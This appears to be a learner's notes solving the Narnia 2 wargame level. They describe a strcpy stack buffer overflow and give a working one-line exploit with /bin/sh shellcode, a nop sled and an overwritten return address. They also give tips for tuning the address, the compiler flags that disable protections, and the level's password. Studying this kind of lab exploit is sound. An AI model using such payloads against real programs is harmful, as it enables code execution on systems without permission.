Narnia 2
========

On first glance this looks like you hand it an argument which it then strcpy's
to a buffer of len 128, and then it printf's that buffer.  I assume you
overflow the buffer, but I'll have to learn more about how to exploit that.
The prior example had a function pointer it called, and you just put shellcode
in that... this just does the strcpy and the printf.  I'll have to read about
how those two commands work, maybe do an strace and look for any execve's?

Seems like buffer is stored at: `$ebp - 0x88`
Buffer size: 128 bytes
Location in gdb: 0xffffd6c8 - 0x80 = 0xffffd648

Our shellcode is 24 bytes long, our nop sled is 128 - 24 = 104 bytes long, and our buffer
is 128 bytes.

``` sh
$ ./narnia2 $(python -c "print('\x90'*4 + '\x31\xc0\x99\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80' + 'A'*104 + '\xb8\xd5\xff\xff')")
```

Jumps to our nop sled!  Executes until our shell code! Tries to start /bin/dash
in new process!

But running outside of gdb doesn't work, why?  Because debug symbols! maybe.
Not totally sure, but try futzing the lower byte on the injected return address
and it'll pop eventually... I had to go from `0xffffd5b8` to `0xffffd5e8`
before it would work, for example.

remember -m32 -fno-stack-protector -Wl,-z,norelro

password: `vaequeezee`
